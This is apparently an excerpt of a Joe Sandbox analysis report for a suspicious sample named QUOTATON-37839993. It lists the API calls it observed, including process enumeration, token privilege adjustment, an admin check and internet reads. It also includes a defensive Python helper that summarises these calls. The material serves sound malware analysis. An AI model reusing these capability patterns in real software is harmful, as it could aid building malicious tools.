                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                      • String ID:
                                                                      • API String ID: 2576544623-0
                                                                      • Opcode ID: 2d1c669f2cc8f9ff6ba847cc2a913d5f9f7760efd0cc060538640fbcda75f1e5
                                                                      • Instruction ID: 5940b931876251158b4681987b04865a5ad7e20c0f71ec4b0d20efc82db59308
                                                                      • Opcode Fuzzy Hash: 2d1c669f2cc8f9ff6ba847cc2a913d5f9f7760efd0cc060538640fbcda75f1e5
                                                                      • Instruction Fuzzy Hash: CE51A271504701AFD310EF20DC86E6BB7E8EF98710F50592DF595A72A2EB70E948CB92
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E5E628
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: 2ba6581e831e3b3f69e5454a1e134532f3eb427b9ac2fbee985cb257d8b93a7c
                                                                      • Instruction ID: cb0a725d7ea75cac03c23f9a596bee79619a369dc54dd1df49c75f24223f7a77
                                                                      • Opcode Fuzzy Hash: 2ba6581e831e3b3f69e5454a1e134532f3eb427b9ac2fbee985cb257d8b93a7c
                                                                      • Instruction Fuzzy Hash: 11322775A007059FD728CF29C4819AAB7F1FF48310B15D96EE89AEB3A1D770E941CB44
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E7180A,00000000), ref: 00E723E1
                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E72418
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                      • String ID:
                                                                      • API String ID: 599397726-0
                                                                      • Opcode ID: 2fb56f448623b926d89d1945b9fe3d95be83021d77987ac6c70fa5b374de0d53
                                                                      • Instruction ID: 2d49e1a59a829b1b37dab41a80f357666d7d355273e78316376112f88cfed3a8
                                                                      • Opcode Fuzzy Hash: 2fb56f448623b926d89d1945b9fe3d95be83021d77987ac6c70fa5b374de0d53
                                                                      • Instruction Fuzzy Hash: 5441F57190420ABFEB20DE95DC81EBB77FCEB40318F10A06EF759B6241EB759E419650
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6B40B
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E6B465
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E6B4B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 63ff0e6bcec6eed41d47fc1ddd4d3da99003070b7191b413f9e70951f653e1a0
                                                                      • Instruction ID: d12c3c9f73388adc97181dff63b3b7c53efc4b534a4640154c168d5099d9b79b
                                                                      • Opcode Fuzzy Hash: 63ff0e6bcec6eed41d47fc1ddd4d3da99003070b7191b413f9e70951f653e1a0
                                                                      • Instruction Fuzzy Hash: 88213275A00118DFCB00EFA5D884AEDBBF8FF49314F1480A9E905EB352DB319955CB51
                                                                      APIs
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
                                                                      • GetLastError.KERNEL32 ref: 00E58865
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1922334811-0
                                                                      • Opcode ID: b7d38447860fcbc9e4e4bdd2873226bd926a6cf80e6f2472b11ff5dd2dce019b
                                                                      • Instruction ID: 376e9207734bde2194d3ca6fb6b36d8010e22876c5b63c00fa7380ffa8db9593
                                                                      • Opcode Fuzzy Hash: b7d38447860fcbc9e4e4bdd2873226bd926a6cf80e6f2472b11ff5dd2dce019b
                                                                      • Instruction Fuzzy Hash: A511BFB2404204AFE718DFA4ED85D6BB7F8EB04315B60952EF856A3251EB30BC448B60
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E58774
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E5878B
                                                                      • FreeSid.ADVAPI32(?), ref: 00E5879B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
                                                                      • Instruction ID: f43f20f24058d4aa527577105c0689161f408363a07310f8ee931bc3de24e714
                                                                      • Opcode Fuzzy Hash: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
                                                                      • Instruction Fuzzy Hash: 2EF03775A11308BFDB00DFE49D89AAEBBB8EF08201F1044A9E905E2181E6756A089B50
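                                                                      The records in this section are raw per-function API listings; what a triager usually wants from them is a per-function capability summary. The Python below is an added example (not Joe Sandbox code and not part of this report) that parses a few "APIs" entries copied from this section in the report's own layout, groups the calls per function, matches each group against a small illustrative rule set of the example's own, and rebuilds the SID from the AllocateAndInitializeSid argument list shown in the record above (sub-authority count 2, values 0x20 and 0x220). The report prints the identifier-authority pointer as "?", so the decoder assumes SECURITY_NT_AUTHORITY (5); under that assumption the SID is S-1-5-32-544, the BUILTIN\Administrators alias that the classic IsUserAnAdmin-style CheckTokenMembership check tests for.

```python
"""Triage helper for the per-function "APIs" listings in a Joe Sandbox
code-analysis section.  Added example: not Joe Sandbox code and not part of
the report.  The rule set and the SID decoder are illustrative."""
import re
from typing import Dict, List, Optional

# Constructed input: a handful of "APIs" entries in the report's own layout.
SAMPLE = """\
APIs
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E580D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E580E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E580F6
Memory Dump Source
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00E04AD0), ref: 00E04B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E04B57
Strings
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00E7EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 00E7EE4B
  • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
• Process32NextW.KERNEL32(00000000,?), ref: 00E7EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E7EF1A
Memory Dump Source
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E58774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E5878B
• FreeSid.ADVAPI32(?), ref: 00E5879B
Memory Dump Source
"""

# One report line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: <hex address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@:]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Illustrative rules (the example's own, not Joe Sandbox signatures): a rule
# fires when every listed API appears among one function's direct calls.
CAPABILITY_RULES: Dict[str, frozenset] = {
    "token information query": frozenset({"GetTokenInformation"}),
    "dynamic API resolution": frozenset({"LoadLibraryA", "GetProcAddress"}),
    "process enumeration": frozenset(
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}),
    "token privilege adjustment": frozenset(
        {"LookupPrivilegeValueW", "AdjustTokenPrivileges"}),
    "admin group membership check": frozenset(
        {"AllocateAndInitializeSid", "CheckTokenMembership"}),
}


def parse_api_blocks(text: str) -> List[List[Dict[str, object]]]:
    """Return one list of calls per "APIs" section, in report order."""
    functions: List[List[Dict[str, object]]] = []
    current: Optional[List[Dict[str, object]]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":          # each header starts a new function
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:    # metadata lines are skipped
            continue
        args = m.group("args")
        current.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args.split(",") if args is not None else [],
            "ref": m.group("ref"),
            "subcall": m.group("sub") is not None,
        })
    return functions


def capabilities(calls: List[Dict[str, object]]) -> List[str]:
    """Rules satisfied by the function's own calls; subcall lines belong to a
    callee and are deliberately not counted."""
    seen = {c["api"] for c in calls if not c["subcall"]}
    return sorted(n for n, needed in CAPABILITY_RULES.items() if needed <= seen)


def sid_from_allocate_args(args: List[str], authority: int = 5) -> str:
    """Rebuild the SID string from AllocateAndInitializeSid's argument list:
    (pIdentifierAuthority, nSubAuthorityCount, sub0..sub7, *pSid).
    The report shows the authority pointer as '?', so the caller supplies it;
    SECURITY_NT_AUTHORITY (5) is assumed by default."""
    count = int(args[1], 16)
    subs = [int(a, 16) for a in args[2:2 + count]]
    return "S-1-" + "-".join(str(x) for x in [authority, *subs])


def summarize(text: str) -> List[Dict[str, object]]:
    """Per-function summary: first call address, API names, matched rules and,
    where AllocateAndInitializeSid is present, the decoded SID."""
    out: List[Dict[str, object]] = []
    for calls in parse_api_blocks(text):
        entry: Dict[str, object] = {
            "first_ref": calls[0]["ref"] if calls else None,
            "apis": [c["api"] for c in calls],
            "capabilities": capabilities(calls),
        }
        for c in calls:
            if c["api"] == "AllocateAndInitializeSid":
                entry["sid"] = sid_from_allocate_args(c["args"])
        out.append(entry)
    return out


if __name__ == "__main__":
    for e in summarize(SAMPLE):
        print(e["first_ref"], e["capabilities"], e.get("sid", ""))
```

Subcall lines ("Part of subcall function ...") are kept in the per-function call list so the address trail is preserved, but they are excluded from rule matching, since the report attributes them to the callee rather than to the function being listed. On the real page the same parser can be fed the whole section; only the rule set needs extending.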
                                                                      APIs
                                                                      • __time64.LIBCMT ref: 00E6889B
                                                                        • Part of subcall function 00E2520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E68F6E,00000000,?,?,?,?,00E6911F,00000000,?), ref: 00E25213
                                                                        • Part of subcall function 00E2520A: __aulldiv.LIBCMT ref: 00E25233
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                      • String ID: 0e
                                                                      • API String ID: 2893107130-533242481
                                                                      • Opcode ID: 0f4e54ff9b82e6b8c6778b4349afedcaaae35e03c8a256d67305c0cbeb7e33e1
                                                                      • Instruction ID: 429b939a89a6b7b9b8296b7d62c8e6021a43521930828481d96b791280ef24aa
                                                                      • Opcode Fuzzy Hash: 0f4e54ff9b82e6b8c6778b4349afedcaaae35e03c8a256d67305c0cbeb7e33e1
                                                                      • Instruction Fuzzy Hash: 3C21AF326356108FC729CF29E841A52B3E1EBA5311B689F6CE0F5DB2D0CA75A909CB54
                                                                      APIs
                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E64CB3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: mouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 2434400541-711622031
                                                                      • Opcode ID: 3b63c56a101e11022768fb8abdf34956ecb0895198d34094fe196f3447125e39
                                                                      • Instruction ID: f729362ce2e3f2dd68a7709a864a68286ad1764591fb2db372c86c44f8aa2267
                                                                      • Opcode Fuzzy Hash: 3b63c56a101e11022768fb8abdf34956ecb0895198d34094fe196f3447125e39
                                                                      • Instruction Fuzzy Hash: E5E046B22E97213CF9082A18BC02EFB02CC8B12375B21220AF814F51C2ED802C8225A8
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E6C6FB
                                                                      • FindClose.KERNEL32(00000000), ref: 00E6C72B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 1b9671eeac4bde72a02e8b8eb009aa42b2ba0f54c7b26139aa1c5e0c2dd8597f
                                                                      • Instruction ID: 8d4c4d1c486ad380aba562e9253185eee862f76b973ad385d8ef530f4b4f388a
                                                                      • Opcode Fuzzy Hash: 1b9671eeac4bde72a02e8b8eb009aa42b2ba0f54c7b26139aa1c5e0c2dd8597f
                                                                      • Instruction Fuzzy Hash: EE1182716006009FDB10DF29D84592AF7E4EF85324F10C51EF8A9E7391DB30A805CB91
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E79468,?,00E8FB84,?), ref: 00E6A097
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E79468,?,00E8FB84,?), ref: 00E6A0A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: 6b183960610e91662c7885f4dbbd4410174326e8771da026a7372f819ff4f783
                                                                      • Instruction ID: 58772d43b1dc1fea1082bbf8f800e77dc076d06df5f2cffbebd64f293b1a1478
                                                                      • Opcode Fuzzy Hash: 6b183960610e91662c7885f4dbbd4410174326e8771da026a7372f819ff4f783
                                                                      • Instruction Fuzzy Hash: 52F0E23554422DABDB20AFA4DC48FEA776CBF083A1F004165F908F2181CA309944CBA1
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58309), ref: 00E581E0
                                                                      • CloseHandle.KERNEL32(?,?,00E58309), ref: 00E581F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 0f558d95040a46037d6d7d679e912dcb349b8b29f1a2cb1353f5152777072dc0
                                                                      • Instruction ID: 3ad5edba0b6b4157b1e5c2206112115f8a6e2bf2778e0e0f66ebe33fe90c9277
                                                                      • Opcode Fuzzy Hash: 0f558d95040a46037d6d7d679e912dcb349b8b29f1a2cb1353f5152777072dc0
                                                                      • Instruction Fuzzy Hash: B8E08C32000620AFEB212B61FC08D737BEAEF04311720982DF8AAE0471CB22AC90DB10
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E28D57,?,?,?,00000001), ref: 00E2A15A
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E2A163
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
                                                                      • Instruction ID: e5e96650a48eef351b6382d28677995d01af2e62a20109302c912e9c00a1526b
                                                                      • Opcode Fuzzy Hash: 6c4849efe7a0ff1c54eae10928979c07c512a46dc63bde4281134e2965fff092
                                                                      • Instruction Fuzzy Hash: 21B09231254308AFCA002B92EC09B883F68EB46AA2F404020F60D94060CB6254548B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
                                                                      • Instruction ID: 2b3b1e7623b84cd5dab6c878d3a77201d816f266c5b857ca65f5a1a318f47171
                                                                      • Opcode Fuzzy Hash: 948773515dfefe471a8f46c89856d15cb35807f24706d5192141743c8be69132
                                                                      • Instruction Fuzzy Hash: 0F322522D29F114DD7279635D832335A299AFB73C8F15E737F81AB5AA5EB28C4C74100
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
                                                                      • Instruction ID: db686e5db0e0fd49e0535164538e448f0634956c7a8edd785cc3e4530addb596
                                                                      • Opcode Fuzzy Hash: dff6ceaf32f0abedb99080420e9491856f31b4ec1517edebbfdc32b944a9a2f8
                                                                      • Instruction Fuzzy Hash: 50B10130D2AF404DD723963A8835336BA9CAFBB2C5F55D72BFC6674D22EB2185874181
                                                                      APIs
                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E58389), ref: 00E587D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: LogonUser
                                                                      • String ID:
                                                                      • API String ID: 1244722697-0
                                                                      • Opcode ID: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
                                                                      • Instruction ID: b22122a9391a9f25a82b07e21fea019a4eb6cdc844089885969641a728972e80
                                                                      • Opcode Fuzzy Hash: 0cabfa572a0816d57320f7ce2b6cd6c61a530b109ef0cf28cf78d2a62f2ad745
                                                                      • Instruction Fuzzy Hash: 7CD09E3226450EAFEF019EA4DD05EAE3B69EB04B01F408511FE15D51A1C775D935AB60
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E2A12A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
